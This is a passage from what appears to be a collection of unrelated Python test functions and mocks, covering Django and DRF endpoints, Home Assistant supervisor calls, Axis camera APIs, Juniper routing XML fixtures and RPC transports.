request)\n\n if not request.service_hops:\n response = pb2.TestResponse(\n id=request.id,\n status=[pb2.CommonResponseStatus(\n status=pb2.SUCCESS,\n )],\n )\n else:\n status = ([pb2.CommonResponseStatus(status=pb2.SUCCESS)] +\n list(service.call_next(request).status))\n response = pb2.TestResponse(id=request.id, status=status)\n\n tracer = execution_context.get_opencensus_tracer()\n tracer.add_attribute_to_current_span(\"reqId\", request.id)\n return response.SerializeToString()", "async def test_fetch_all_dispatch_routes(client):\n params = [('access_token', 'access_token_example'),\n ('group_id', 56),\n ('end_time', 56),\n ('duration', 56)]\n headers = { \n 'Accept': 'application/json',\n }\n response = await client.request(\n method='GET',\n path='/v1/fleet/dispatch/routes',\n headers=headers,\n params=params,\n )\n assert response.status == 200, 'Response body is : ' + (await response.read()).decode('utf-8')", "def test_available_incoming_call(self, *mocks):\n call_data = {\n 'sip_user_id': '123456789',\n 'caller_id': 'Test name',\n 'phonenumber': '0123456789',\n }\n\n # Call non existing device.\n response = self.client.post(self.incoming_url, call_data)\n self.assertEqual(response.content, b'status=NAK')\n\n two_weeks_ago = datetime.now() - timedelta(days=14)\n Device.objects.create(\n name='test device',\n token='a652aee84bdec6c2859eec89a6e5b1a42c400fba43070f404148f27b502610b6',\n sip_user_id='123456789',\n os_version='8.3',\n client_version='1.0',\n last_seen=two_weeks_ago,\n app=self.android_app,\n )\n call_data['call_id'] = 'asdr2378945auhfjkasdghf897eoiehajklh'\n\n # Now the device exists, call it again in seperate thread.\n thread = ThreadWithReturn(target=self.client.post, args=(self.incoming_url, call_data))\n thread.start()\n\n # Simulate some wait-time before device responds.\n time.sleep(1.5)\n\n app_data = {\n 'unique_key': call_data['call_id'],\n 'message_start_time': time.time(),\n }\n # Send the fake response from device.\n self.client.post(self.response_url, app_data)\n\n # Wait for the incoming-call to finish.\n response = thread.join()\n\n # Check if incoming-call got accepted.\n self.assertEqual(response.content, b'status=ACK')\n self.assertEqual(cache.get('attempts'), 2)", "def setUp(self):\n self.client = APIClient()\n\n self.speciality = models.Speciality.objects.create(\n name='Speciality'\n )\n\n self.payload = {\n 'name': \"Knee Replacement\",\n 'speciality': [self.speciality.pk],\n 'days_in_hospital': 2,\n 'days_in_destination': 2,\n 'duration_minutes': 120,\n 'overview': '<strong>Bla</strong> bla bla',\n }", "def mock_default_vapix_requests(respx: respx, host: str = DEFAULT_HOST) -> None:\n respx.post(f\"http://{host}:80/axis-cgi/apidiscovery.cgi\").respond(\n json=API_DISCOVERY_RESPONSE,\n )\n respx.post(f\"http://{host}:80/axis-cgi/basicdeviceinfo.cgi\").respond(\n json=BASIC_DEVICE_INFO_RESPONSE,\n )\n respx.post(f\"http://{host}:80/axis-cgi/io/portmanagement.cgi\").respond(\n json=PORT_MANAGEMENT_RESPONSE,\n )\n respx.post(f\"http://{host}:80/axis-cgi/lightcontrol.cgi\").respond(\n json=LIGHT_CONTROL_RESPONSE,\n )\n respx.post(f\"http://{host}:80/axis-cgi/mqtt/client.cgi\").respond(\n json=MQTT_CLIENT_RESPONSE,\n )\n respx.post(f\"http://{host}:80/axis-cgi/streamprofile.cgi\").respond(\n json=STREAM_PROFILES_RESPONSE,\n )\n respx.post(f\"http://{host}:80/axis-cgi/viewarea/info.cgi\").respond(\n json=VIEW_AREAS_RESPONSE\n )\n respx.get(\n f\"http://{host}:80/axis-cgi/param.cgi?action=list&group=root.Brand\"\n ).respond(\n text=BRAND_RESPONSE,\n headers={\"Content-Type\": \"text/plain\"},\n )\n respx.get(\n f\"http://{host}:80/axis-cgi/param.cgi?action=list&group=root.Image\"\n ).respond(\n text=IMAGE_RESPONSE,\n headers={\"Content-Type\": \"text/plain\"},\n )\n respx.get(\n f\"http://{host}:80/axis-cgi/param.cgi?action=list&group=root.Input\"\n ).respond(\n text=PORTS_RESPONSE,\n headers={\"Content-Type\": \"text/plain\"},\n )\n respx.get(\n f\"http://{host}:80/axis-cgi/param.cgi?action=list&group=root.IOPort\"\n ).respond(\n text=PORTS_RESPONSE,\n headers={\"Content-Type\": \"text/plain\"},\n )\n respx.get(\n f\"http://{host}:80/axis-cgi/param.cgi?action=list&group=root.Output\"\n ).respond(\n text=PORTS_RESPONSE,\n headers={\"Content-Type\": \"text/plain\"},\n )\n respx.get(\n f\"http://{host}:80/axis-cgi/param.cgi?action=list&group=root.Properties\"\n ).respond(\n text=PROPERTIES_RESPONSE,\n headers={\"Content-Type\": \"text/plain\"},\n )\n respx.get(\n f\"http://{host}:80/axis-cgi/param.cgi?action=list&group=root.PTZ\"\n ).respond(\n text=PTZ_RESPONSE,\n headers={\"Content-Type\": \"text/plain\"},\n )\n respx.get(\n f\"http://{host}:80/axis-cgi/param.cgi?action=list&group=root.StreamProfile\"\n ).respond(\n text=STREAM_PROFILES_RESPONSE,\n headers={\"Content-Type\": \"text/plain\"},\n )\n respx.post(f\"http://{host}:80/axis-cgi/applications/list.cgi\").respond(\n text=APPLICATIONS_LIST_RESPONSE,\n headers={\"Content-Type\": \"text/xml\"},\n )\n respx.post(f\"http://{host}:80/local/vmd/control.cgi\").respond(json=VMD4_RESPONSE)", "def test_create_multiple(self):\n contact = Contact.objects.first()\n sales_cycle = contact.sales_cycles.first()\n valid_data = [{'sales_cycle_id':sales_cycle.id, 'description':'test message', 'contact_id': contact.id}]\n url, parsed = self.prepare_urls('v1:activity-create-multiple', subdomain=self.company.subdomain)\n \n response = self.client.post(url, valid_data, HTTP_HOST=parsed.netloc, format='json')\n self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED)\n\n self.authenticate_user()\n response = self.client.post(url, valid_data, HTTP_HOST=parsed.netloc, format='json')\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n\n content = json.loads(response.content)\n self.assertTrue(content.has_key('notification'))", "async def test_create_dispatch_route(client):\n create_dispatch_route_params = null\n params = [('access_token', 'access_token_example')]\n headers = { \n 'Accept': 'application/json',\n 'Content-Type': 'application/json',\n }\n response = await client.request(\n method='POST',\n path='/v1/fleet/dispatch/routes',\n headers=headers,\n json=create_dispatch_route_params,\n params=params,\n )\n assert response.status == 200, 'Response body is : ' + (await response.read()).decode('utf-8')", "def setUp(self):\n super(TestSyncServiceControl, self).setUp()\n self.api = ExternalApiClient()", "def test_called(self, mock_bootstrap, mock_api, mock_match):\n # host/port details returned by bootstrap\n mock_bootstrap.side_effect = [('host', 1234)]\n # short-circuit version checking\n mock_match.side_effect = [True] * 2\n mock_api.version().side_effect = ['1.0.0']\n\n # Check that all four api's created are passed the network details\n with patch('fetchai.ledger.api.TokenApi') as tapi, \\\n patch('fetchai.ledger.api.ContractsApi') as capi, \\\n patch('fetchai.ledger.api.TransactionApi') as txapi, \\\n patch('fetchai.ledger.api.ServerApi') as sapi:\n _ = LedgerApi(network='alpha')\n\n tapi.assert_called_once_with('host', 1234)\n capi.assert_called_once_with('host', 1234)\n txapi.assert_called_once_with('host', 1234)\n sapi.assert_called_once_with('host', 1234)\n\n # Check that bootstrap is queried\n mock_bootstrap.assert_called_once_with('alpha')", "def test_post(self):\n self.client.force_login(self.john)\n\n with self.subTest(\"Test start task success\"):\n resp = self.client.post(self.URL, data={'taskType': 1})\n\n self.assertEqual(\n resp.status_code,\n status.HTTP_201_CREATED,\n \"Gamer cant create the task via API!\"\n )\n\n with self.subTest(\"Start the same task again fail\"):\n resp = self.client.post(self.URL, data={'taskType': 1})\n\n self.assertEqual(\n resp.status_code,\n status.HTTP_409_CONFLICT\n )", "def test_get_Events(self):\n event_a = Event.objects.create(title=\"christmas party\",\n start=datetime.strptime(\"2020-12-03 12:00\", \"%Y-%m-%d %H:%M\"),\n end=datetime.strptime(\"2020-12-03 16:00\", \"%Y-%m-%d %H:%M\"),\n event_owner=self.person_a,\n duration=timedelta(hours=4),\n recurrence_interval=0, description=\"happy christmas party\", website_publish=True)\n event_a.invites.add(self.comms_grp)\n event_a.save()\n event_b = Event.objects.create(title=\"Spring clean\",\n start=datetime.strptime(\"2020-04-03 09:00\", \"%Y-%m-%d %H:%M\"),\n end=datetime.strptime(\"2020-04-03 16:00\", \"%Y-%m-%d %H:%M\"),\n event_owner=self.person_a,\n duration=timedelta(hours=7),\n recurrence_interval=0, description=\"get the church clean\", website_publish=True)\n event_b.invites.add(self.comms_grp)\n event_b.save()\n client = APIClient()\n resp = client.get('/api/events')\n self.assertEqual(resp.status_code, 200)\n events = Event.objects.all()\n self.assertEqual(events[0].title, json.loads(resp.content)[1]['title'])\n self.assertEqual(events[1].title, json.loads(resp.content)[0]['title'])", "def test_run():\n gid = 123\n azure = create_azure_mock('GROUP1', [1, 2, 4, 5, 6, 7])\n data = [create_everbridge_contacts([1, 2, 3, 5, 8], True)]\n delete_ids = [3, 8]\n update_ids = [1, 2]\n insert_ids = [4, 6, 7]\n modify_everbridge_data(data[0], update_ids, 'phone', '8087779999')\n modify_everbridge_data(data[0], delete_ids, 'groups', [gid])\n update_data = create_everbridge_contacts(update_ids, True)\n insert_data = create_everbridge_contacts(insert_ids, False)\n upsert_data = update_data + insert_data\n inserted_data = [create_everbridge_contacts(insert_ids, True)]\n inserted_exids = (\n '&[email protected]' +\n '&[email protected]' +\n '&[email protected]')\n ever = create_everbridge_mock(data)\n ever.get_contacts_by_external_ids = MagicMock(side_effect=inserted_data)\n app = Synchronizer(azure, ever)\n # Call run\n rslt = app.run([gid])\n # Tests each method call\n azure.get_group_name.assert_called_with(123)\n ever.get_group_id_by_name.assert_called_with('GROUP1')\n ever.add_group.assert_not_called()\n ever.delete_group.assert_not_called()\n ever.delete_members_from_group.assert_called_with(gid, delete_ids)\n ever.delete_contacts.assert_called_with(delete_ids)\n ever.upsert_contacts.assert_called_with(upsert_data)\n ever.get_contacts_by_external_ids.assert_called_with(inserted_exids)\n ever.add_members_to_group.assert_called_with(gid, insert_ids)\n assert rslt == {\n 'GROUP1': {\n 'azure_group_id': 123, 'everbridge_group_id': 123,\n 'azure_count': 6, 'everbridge_count': 5, 'error_contacts': 0,\n 'inserted_contacts': 3, 'updated_contacts': 2, 'removed_members': 2,\n 'deleted_contacts': 2, 'added_members': 3}\n }", "def test_WINNF_FT_S_REG_9(self):\n\n # Register the device\n device_a = json.load(\n open(os.path.join('testcases', 'testdata', 'device_a.json')))\n device_b = json.load(\n open(os.path.join('testcases', 'testdata', 'device_b.json')))\n device_c = json.load(\n open(os.path.join('testcases', 'testdata', 'device_c.json')))\n\n # Inject FCC IDs\n self._sas_admin.InjectFccId({'fccId': device_a['fccId']})\n self._sas_admin.InjectFccId({'fccId': device_b['fccId']})\n self._sas_admin.InjectFccId({'fccId': device_c['fccId']})\n\n # Make sure measCapability contains no value for all array elements\n device_a['measCapability'] = []\n device_b['measCapability'] = []\n device_c['measCapability'] = []\n\n # Register two devices\n request = {'registrationRequest': [device_a, device_b]}\n response = self._sas.Registration(request)\n \n # Check registration response\n self.assertEqual(len(response['registrationResponse']), 2)\n for resp in response['registrationResponse']:\n self.assertTrue('cbsdId' in resp)\n self.assertEqual(resp['response']['responseCode'], 0)\n\n del request, response\n\n # Re-register two devices, register third device\n devices = [device_a, device_b, device_c]\n request = {'registrationRequest': devices}\n response = self._sas.Registration(request)\n\n # Check registration response\n self.assertEqual(len(response['registrationResponse']), len(devices))\n for resp in response['registrationResponse']:\n self.assertTrue('cbsdId' in resp)\n self.assertFalse('measReportConfig' in resp)\n self.assertEqual(resp['response']['responseCode'], 0)", "def makeTestMethods(name, fields):\n\n def tstCreateOK(self):\n post_json_body = {}\n post_json_body.update(fields)\n response = app.post_json('/cru_api.{}_create'.format(name.lower()),\n post_json_body,\n headers={'x-rooms-dev-signin-email': '[email protected]'})\n self.assertEquals('200 OK', response.status)\n self.assertIn(post_json_body['name'], response)\n\n def tstCreateBadHasId(self):\n post_json_body = {'id': self.keys[name.upper()].integer_id()}\n post_json_body.update(fields)\n response = app.post_json('/cru_api.{}_create'.format(name.lower()),\n post_json_body,\n status=400,\n headers={'x-rooms-dev-signin-email': '[email protected]'})\n self.assertEquals('400 Bad Request', response.status)\n\n def tstReadBadWrongMethod(self):\n response = app.get('/cru_api.{}_read'.format(name.lower()),\n status=400)\n self.assertEquals('400 Bad Request', response.status)\n\n def tstReadBadNoContent(self):\n response = app.post_json('/cru_api.{}_read'.format(name.lower()),\n {},\n status=400,\n headers={'x-rooms-dev-signin-email': '[email protected]'})\n self.assertEquals('400 Bad Request', response.status)\n\n def tstReadBadWrongId(self):\n response = app.post_json('/cru_api.{}_read'.format(name.lower()),\n {'id': 999},\n status=400,\n headers={'x-rooms-dev-signin-email': '[email protected]'})\n self.assertEquals('400 Bad Request', response.status)\n\n def tstReadOK(self):\n response = app.post_json('/cru_api.{}_read'.format(name.lower()),\n {'id': self.keys[name.upper()].integer_id()},\n headers={'x-rooms-dev-signin-email': '[email protected]'})\n self.assertEquals('200 OK', response.status)\n self.assertIn('id', response)\n\n def tstUpdateOK(self):\n post_json_body = {'id': self.keys[name.upper()].integer_id()}\n post_json_body.update(fields)\n response = app.post_json('/cru_api.{}_update'.format(name.lower()),\n post_json_body,\n headers={'x-rooms-dev-signin-email': '[email protected]'})\n self.assertEquals('200 OK', response.status)\n self.assertIn('id', response)\n self.assertIn(fields.keys().pop(), response)\n\n def tstUpdateBadMissingId(self):\n post_json_body = {}\n post_json_body.update(fields)\n response = app.post_json('/cru_api.{}_update'.format(name.lower()),\n post_json_body,\n status=400,\n headers={'x-rooms-dev-signin-email': '[email protected]'})\n self.assertEquals('400 Bad Request', response.status)\n\n def tstUpdateBadWrongId(self):\n post_json_body = {'id': 999}\n post_json_body.update(fields)\n response = app.post_json('/cru_api.{}_update'.format(name.lower()),\n post_json_body,\n status=400,\n headers={'x-rooms-dev-signin-email': '[email protected]'})\n self.assertEquals('400 Bad Request', response.status)\n\n return (tstCreateOK,\n tstCreateBadHasId,\n tstReadBadWrongMethod,\n tstReadBadNoContent,\n tstReadBadWrongId,\n tstReadOK,\n tstUpdateOK,\n tstUpdateBadMissingId,\n tstUpdateBadWrongId)", "def setUp(self):\n self.tool = flow_common_tool()\n self.xml = xml_tool()\n self.ins = route()\n\n self.response = {}\n self.response[\"HA_SINGLE_INSTANCE\"] = \"\"\"\n <instance-information xmlns=\"http://xml.juniper.net/junos/18.1I0/junos-routing\" junos:style=\"terse\">\n <instance-core>\n <instance-name>master</instance-name>\n <instance-type>forwarding</instance-type>\n <instance-rib>\n <irib-name>inet.0</irib-name>\n <irib-active-count>22</irib-active-count>\n <irib-holddown-count>0</irib-holddown-count>\n <irib-hidden-count>0</irib-hidden-count>\n </instance-rib>\n <instance-rib>\n <irib-name>inet6.0</irib-name>\n <irib-active-count>7</irib-active-count>\n <irib-holddown-count>0</irib-holddown-count>\n <irib-hidden-count>0</irib-hidden-count>\n </instance-rib>\n </instance-core>\n </instance-information>\n \"\"\"\n\n self.response[\"HA_MULTI_INSTANCE\"] = \"\"\"\n <instance-information xmlns=\"http://xml.juniper.net/junos/18.1I0/junos-routing\" junos:style=\"terse\">\n <instance-core>\n <instance-name>master</instance-name>\n <instance-type>forwarding</instance-type>\n <instance-rib>\n <irib-name>inet.0</irib-name>\n <irib-active-count>22</irib-active-count>\n <irib-holddown-count>0</irib-holddown-count>\n <irib-hidden-count>0</irib-hidden-count>\n </instance-rib>\n <instance-rib>\n <irib-name>inet6.0</irib-name>\n <irib-active-count>7</irib-active-count>\n <irib-holddown-count>0</irib-holddown-count>\n <irib-hidden-count>0</irib-hidden-count>\n </instance-rib>\n </instance-core>\n <instance-core>\n <instance-name>__juniper_private1__</instance-name>\n <instance-type>forwarding</instance-type>\n <instance-rib>\n <irib-name>__juniper_private1__.inet.0</irib-name>\n <irib-active-count>12</irib-active-count>\n <irib-holddown-count>0</irib-holddown-count>\n <irib-hidden-count>0</irib-hidden-count>\n </instance-rib>\n </instance-core>\n <instance-core>\n <instance-name>__juniper_private2__</instance-name>\n <instance-type>forwarding</instance-type>\n <instance-rib>\n <irib-name>__juniper_private2__.inet.0</irib-name>\n <irib-active-count>0</irib-active-count>\n <irib-holddown-count>0</irib-holddown-count>\n <irib-hidden-count>1</irib-hidden-count>\n </instance-rib>\n </instance-core>\n <instance-core>\n <instance-name>__juniper_private3__</instance-name>\n <instance-type>forwarding</instance-type>\n </instance-core>\n <instance-core>\n <instance-name>__juniper_private4__</instance-name>\n <instance-type>forwarding</instance-type>\n <instance-rib>\n <irib-name>__juniper_private4__.inet.0</irib-name>\n <irib-active-count>2</irib-active-count>\n <irib-holddown-count>0</irib-holddown-count>\n <irib-hidden-count>0</irib-hidden-count>\n </instance-rib>\n </instance-core>\n <instance-core>\n <instance-name>__master.anon__</instance-name>\n <instance-type>forwarding</instance-type>\n </instance-core>\n <instance-core>\n <instance-name>mgmt_junos</instance-name>\n <instance-type>forwarding</instance-type>\n </instance-core>\n </instance-information>\n \"\"\"\n\n\n self.response[\"HA_SINGLE_INSTANCE_BRIEF\"] = \"\"\"\n <instance-information xmlns=\"http://xml.juniper.net/junos/18.1I0/junos-routing\" junos:style=\"terse\">\n <instance-core>\n <instance-name>master</instance-name>\n <instance-type>forwarding</instance-type>\n <instance-rib>\n <irib-name>inet.0</irib-name>\n <irib-active-count>18</irib-active-count>\n <irib-holddown-count>0</irib-holddown-count>\n <irib-hidden-count>0</irib-hidden-count>\n </instance-rib>\n <instance-rib>\n <irib-name>inet6.0</irib-name>\n <irib-active-count>1</irib-active-count>\n <irib-holddown-count>0</irib-holddown-count>\n <irib-hidden-count>0</irib-hidden-count>\n </instance-rib>\n </instance-core>\n </instance-information>\n \"\"\"\n\n self.response[\"HA_SINGLE_INSTANCE_DETAIL\"] = \"\"\"\n <instance-information xmlns=\"http://xml.juniper.net/junos/18.1I0/junos-routing\" junos:style=\"detail\">\n <instance-core>\n <instance-name>master</instance-name>\n <router-id>10.208.133.147</router-id>\n <instance-type>forwarding</instance-type>\n <instance-state>Active</instance-state>\n <instance-rib>\n <irib-name>inet.0</irib-name>\n <irib-route-count>18</irib-route-count>\n <irib-active-count>18</irib-active-count>\n <irib-holddown-count>0</irib-holddown-count>\n <irib-hidden-count>0</irib-hidden-count>\n </instance-rib>\n <instance-rib>\n <irib-name>inet6.0</irib-name>\n <irib-route-count>1</irib-route-count>\n <irib-active-count>1</irib-active-count>\n <irib-holddown-count>0</irib-holddown-count>\n <irib-hidden-count>0</irib-hidden-count>\n </instance-rib>\n </instance-core>\n </instance-information>\n \"\"\"\n\n self.response[\"HA_SINGLE_INSTANCE_EXTENSIVE\"] = \"\"\"\n <instance-information xmlns=\"http://xml.juniper.net/junos/18.1I0/junos-routing\" junos:style=\"detail\">\n <instance-core>\n <instance-name>master</instance-name>\n <router-id>10.208.133.147</router-id>\n <instance-type>forwarding</instance-type>\n <instance-state>Active</instance-state>\n <instance-rib>\n <irib-name>inet.0</irib-name>\n <irib-route-count>20</irib-route-count>\n <irib-active-count>20</irib-active-count>\n <irib-holddown-count>0</irib-holddown-count>\n <irib-hidden-count>0</irib-hidden-count>\n </instance-rib>\n <instance-rib>\n <irib-name>inet.1</irib-name>\n <irib-route-count>0</irib-route-count>\n <irib-active-count>0</irib-active-count>\n <irib-holddown-count>0</irib-holddown-count>\n <irib-hidden-count>0</irib-hidden-count>\n </instance-rib>\n <instance-rib>\n <irib-name>inet.2</irib-name>\n <irib-route-count>0</irib-route-count>\n <irib-active-count>0</irib-active-count>\n <irib-holddown-count>0</irib-holddown-count>\n <irib-hidden-count>0</irib-hidden-count>\n </instance-rib>\n <instance-rib>\n <irib-name>inet.3</irib-name>\n <irib-route-count>0</irib-route-count>\n <irib-active-count>0</irib-active-count>\n <irib-holddown-count>0</irib-holddown-count>\n <irib-hidden-count>0</irib-hidden-count>\n </instance-rib>\n <instance-rib>\n <irib-name>iso.0</irib-name>\n <irib-route-count>0</irib-route-count>\n <irib-active-count>0</irib-active-count>\n <irib-holddown-count>0</irib-holddown-count>\n <irib-hidden-count>0</irib-hidden-count>\n </instance-rib>\n <instance-rib>\n <irib-name>mpls.0</irib-name>\n <irib-route-count>0</irib-route-count>\n <irib-active-count>0</irib-active-count>\n <irib-holddown-count>0</irib-holddown-count>\n <irib-hidden-count>0</irib-hidden-count>\n </instance-rib>\n <instance-rib>\n <irib-name>__mpls-oam__.mpls.0</irib-name>\n <irib-route-count>0</irib-route-count>\n <irib-active-count>0</irib-active-count>\n <irib-holddown-count>0</irib-holddown-count>\n <irib-hidden-count>0</irib-hidden-count>\n </instance-rib>\n <instance-rib>\n <irib-name>inet6.0</irib-name>\n <irib-route-count>5</irib-route-count>\n <irib-active-count>5</irib-active-count>\n <irib-holddown-count>0</irib-holddown-count>\n <irib-hidden-count>0</irib-hidden-count>\n </instance-rib>\n <instance-rib>\n <irib-name>inet6.1</irib-name>\n <irib-route-count>0</irib-route-count>\n <irib-active-count>0</irib-active-count>\n <irib-holddown-count>0</irib-holddown-count>\n <irib-hidden-count>0</irib-hidden-count>\n </instance-rib>\n <instance-rib>\n <irib-name>inet6.2</irib-name>\n <irib-route-count>0</irib-route-count>\n <irib-active-count>0</irib-active-count>\n <irib-holddown-count>0</irib-holddown-count>\n <irib-hidden-count>0</irib-hidden-count>\n </instance-rib>\n <instance-rib>\n <irib-name>inet6.3</irib-name>\n <irib-route-count>0</irib-route-count>\n <irib-active-count>0</irib-active-count>\n <irib-holddown-count>0</irib-holddown-count>\n <irib-hidden-count>0</irib-hidden-count>\n </instance-rib>\n <instance-rib>\n <irib-name>l2circuit.0</irib-name>\n <irib-route-count>0</irib-route-count>\n <irib-active-count>0</irib-active-count>\n <irib-holddown-count>0</irib-holddown-count>\n <irib-hidden-count>0</irib-hidden-count>\n </instance-rib>\n <instance-rib>\n <irib-name>mdt.0</irib-name>\n <irib-route-count>0</irib-route-count>\n <irib-active-count>0</irib-active-count>\n <irib-holddown-count>0</irib-holddown-count>\n <irib-hidden-count>0</irib-hidden-count>\n </instance-rib>\n <instance-rib>\n <irib-name>l2protection.0</irib-name>\n <irib-route-count>0</irib-route-count>\n <irib-active-count>0</irib-active-count>\n <irib-holddown-count>0</irib-holddown-count>\n <irib-hidden-count>0</irib-hidden-count>\n </instance-rib>\n <instance-rib>\n <irib-name>lsdist.0</irib-name>\n <irib-route-count>0</irib-route-count>\n <irib-active-count>0</irib-active-count>\n <irib-holddown-count>0</irib-holddown-count>\n <irib-hidden-count>0</irib-hidden-count>\n </instance-rib>\n <instance-rib>\n <irib-name>lsdist.1</irib-name>\n <irib-route-count>0</irib-route-count>\n <irib-active-count>0</irib-active-count>\n <irib-holddown-count>0</irib-holddown-count>\n <irib-hidden-count>0</irib-hidden-count>\n </instance-rib>\n <instance-rib>\n <irib-name>inetcolor.0</irib-name>\n <irib-route-count>0</irib-route-count>\n <irib-active-count>0</irib-active-count>\n <irib-holddown-count>0</irib-holddown-count>\n <irib-hidden-count>0</irib-hidden-count>\n </instance-rib>\n <instance-rib>\n <irib-name>inet6color.0</irib-name>\n <irib-route-count>0</irib-route-count>\n <irib-active-count>0</irib-active-count>\n <irib-holddown-count>0</irib-holddown-count>\n <irib-hidden-count>0</irib-hidden-count>\n </instance-rib>\n </instance-core>\n </instance-information>\n \"\"\"\n\n self.response[\"HA_SINGLE_INSTANCE_SUMMARY\"] = \"\"\"\n <instance-information xmlns=\"http://xml.juniper.net/junos/18.1I0/junos-routing\" junos:style=\"terse\">\n <instance-core>\n <instance-name>master</instance-name>\n <instance-type>forwarding</instance-type>\n <instance-rib>\n <irib-name>inet.0</irib-name>\n <irib-active-count>22</irib-active-count>\n <irib-holddown-count>0</irib-holddown-count>\n <irib-hidden-count>0</irib-hidden-count>\n </instance-rib>\n <instance-rib>\n <irib-name>inet6.0</irib-name>\n <irib-active-count>5</irib-active-count>\n <irib-holddown-count>0</irib-holddown-count>\n <irib-hidden-count>0</irib-hidden-count>\n </instance-rib>\n </instance-core>\n </instance-information>\n \"\"\"\n\n self.response[\"SA_INSTANCE_TEXT\"] = \"\"\"\nInstance Type\n Primary RIB Active/holddown/hidden\nmaster forwarding\n inet.0 18/0/0\n\n__juniper_private1__ forwarding\n __juniper_private1__.inet.0 6/0/0\n\n__juniper_private2__ forwarding\n __juniper_private2__.inet.0 0/0/1\n\n__juniper_private3__ forwarding\n\n__juniper_private4__ forwarding\n __juniper_private4__.inet.0 2/0/0\n\n__master.anon__ forwarding\n \"\"\"", "def testSimpleLoadTestWithSubscription(self):\n def sendRequestExpect200():\n response = requests.get(\"http://localhost:%d/weather/alice\" % self.port_number)\n self.assertEqual(response.status_code, 200)\n self.assertEqual(response.text, 'cloudy')\n # Subscribe Alice to weather updates so that messages\n # are persisted when posted.\n response = requests.post(\"http://localhost:%d/weather/alice\" % self.port_number, data='')\n self.assertEqual(response.status_code, 200)\n # Check that server stays up after multiple requests.\n self.runMultipleRequests(100, sendRequestExpect200)", "async def test_multiple_rpc_transports(loop, server, redis_server_b, consume_rpcs):\n registry.add(ApiA())\n registry.add(ApiB())\n\n manually_set_plugins(plugins={})\n\n redis_server_a = server\n\n port_a = redis_server_a.tcp_address.port\n port_b = redis_server_b.tcp_address.port\n\n logging.warning(f'Server A port: {port_a}')\n logging.warning(f'Server B port: {port_b}')\n\n config = Config.load_dict({\n 'bus': {\n 'schema': {\n 'transport': {'redis': {'url': f'redis://localhost:{port_a}'}},\n }\n },\n 'apis': {\n 'default': {\n 'rpc_transport': {'redis': {'url': f'redis://localhost:{port_a}'}},\n 'result_transport': {'redis': {'url': f'redis://localhost:{port_a}'}},\n },\n 'api_b': {\n 'rpc_transport': {'redis': {'url': f'redis://localhost:{port_b}'}},\n 'result_transport': {'redis': {'url': f'redis://localhost:{port_b}'}},\n },\n }\n })\n\n bus = BusNode(name='', parent=None, bus_client=lightbus.BusClient(config=config, loop=loop))\n asyncio.ensure_future(consume_rpcs(bus))\n await asyncio.sleep(0.1)\n\n await bus.api_a.rpc_a.call_async()\n await bus.api_b.rpc_b.call_async()", "def mock_all(aioclient_mock, request):\n aioclient_mock.post(\"http://127.0.0.1/openpeerpower/options\", json={\"result\": \"ok\"})\n aioclient_mock.get(\"http://127.0.0.1/supervisor/ping\", json={\"result\": \"ok\"})\n aioclient_mock.post(\"http://127.0.0.1/supervisor/options\", json={\"result\": \"ok\"})\n aioclient_mock.get(\n \"http://127.0.0.1/info\",\n json={\n \"result\": \"ok\",\n \"data\": {\"supervisor\": \"222\", \"openpeerpower\": \"0.110.0\", \"oppos\": None},\n },\n )\n aioclient_mock.get(\n \"http://127.0.0.1/store\",\n json={\n \"result\": \"ok\",\n \"data\": {\"addons\": [], \"repositories\": []},\n },\n )\n aioclient_mock.get(\n \"http://127.0.0.1/host/info\",\n json={\n \"result\": \"ok\",\n \"data\": {\n \"result\": \"ok\",\n \"data\": {\n \"coppis\": \"vm\",\n \"operating_system\": \"Debian GNU/Linux 10 (buster)\",\n \"kernel\": \"4.19.0-6-amd64\",\n },\n },\n },\n )\n aioclient_mock.get(\n \"http://127.0.0.1/core/info\",\n json={\"result\": \"ok\", \"data\": {\"version_latest\": \"1.0.0\"}},\n )\n aioclient_mock.get(\n \"http://127.0.0.1/os/info\",\n json={\"result\": \"ok\", \"data\": {\"version_latest\": \"1.0.0\"}},\n )\n aioclient_mock.get(\n \"http://127.0.0.1/supervisor/info\",\n json={\n \"result\": \"ok\",\n \"data\": {\"version_latest\": \"1.0.0\"},\n \"addons\": [\n {\n \"name\": \"test\",\n \"slug\": \"test\",\n \"installed\": True,\n \"update_available\": False,\n \"version\": \"1.0.0\",\n \"version_latest\": \"1.0.0\",\n \"repository\": \"core\",\n \"url\": \"https://github.com/openpeerpower/addons/test\",\n },\n {\n \"name\": \"test2\",\n \"slug\": \"test2\",\n \"installed\": True,\n \"update_available\": False,\n \"version\": \"1.0.0\",\n \"version_latest\": \"1.0.0\",\n \"repository\": \"core\",\n \"url\": \"https://github.com\",\n },\n ],\n },\n )\n aioclient_mock.get(\n \"http://127.0.0.1/ingress/panels\", json={\"result\": \"ok\", \"data\": {\"panels\": {}}}\n )", "async def test_api_call_service_with_data(\n hass: HomeAssistant, mock_api_client: TestClient\n) -> None:\n\n @ha.callback\n def listener(service_call):\n \"\"\"Record that our service got called.\n\n Also test if our data came through.\n \"\"\"\n hass.states.async_set(\n \"test.data\",\n \"on\",\n {\"data\": service_call.data[\"test\"]},\n context=service_call.context,\n )\n\n hass.services.async_register(\"test_domain\", \"test_service\", listener)\n\n resp = await mock_api_client.post(\n \"/api/services/test_domain/test_service\", json={\"test\": 1}\n )\n data = await resp.json()\n assert len(data) == 1\n state = data[0]\n assert state[\"entity_id\"] == \"test.data\"\n assert state[\"state\"] == \"on\"\n assert state[\"attributes\"] == {\"data\": 1}", "def testEndpoint(self):\n # Register an exporter\n context = self.framework.get_bundle_context()\n exporter = Exporter(context)\n context.register_service(pelix.remote.SERVICE_EXPORT_PROVIDER,\n exporter, {})\n\n # With no UID given\n status, _ = self._http_get(\"/endpoint\")\n\n # Check result\n self.assertEqual(status, 404)\n\n # Register a service\n svc_reg = context.register_service(\n \"sample.spec\", object(),\n {pelix.remote.PROP_EXPORTED_INTERFACES: \"*\"})\n\n # Get the endpoint bean\n endpoint = exporter.endpoints[-1]\n\n # Request the details of the endpoint\n status, response = self._http_get(\"/endpoint/{0}\".format(endpoint.uid))\n\n # Check result\n self.assertEqual(status, 200)\n\n # Check the content\n data = json.loads(response)\n for key, attr in (('uid', 'uid'), ('sender', 'framework'),\n ('name', 'name')):\n self.assertEqual(data[key], getattr(endpoint, attr))\n\n # Unregister it\n svc_reg.unregister()\n\n # Request the list of endpoints\n status, _ = self._http_get(\"/endpoint/{0}\".format(endpoint.uid))\n\n # Check result\n self.assertEqual(status, 404)", "def test_multiple_requests(self):\n s = self.api.session()\n s.request(\"1.2.3.4\", \"mozilla\", 